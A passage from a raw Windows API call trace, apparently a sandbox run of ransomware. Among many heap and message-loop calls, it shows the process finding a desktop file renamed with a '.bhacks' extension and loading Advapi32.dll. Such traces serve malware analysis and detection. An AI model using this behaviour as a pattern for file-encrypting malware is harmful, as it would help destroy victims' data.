| out: lpMsg=0x8cf708) returned 0 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0101.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0101.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0101.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.741] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0101.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0101.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0101.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0101.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.742] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0101.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0101.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0101.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0101.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.742] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/J_gUxI4K04bkqo7tW4.avi.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cfc8f3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24cfc8f3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24e51519, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xfb70, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi.bhacks", cAlternateFileName="J_GUXI~1.BHA")) returned 0x9a3b80 [0101.743] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.743] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0101.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0101.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.744] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0101.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0101.744] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.744] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.744] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.745] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0101.745] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.745] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.745] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0101.745] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.745] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0101.745] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b78 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.746] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0101.746] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0101.746] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: 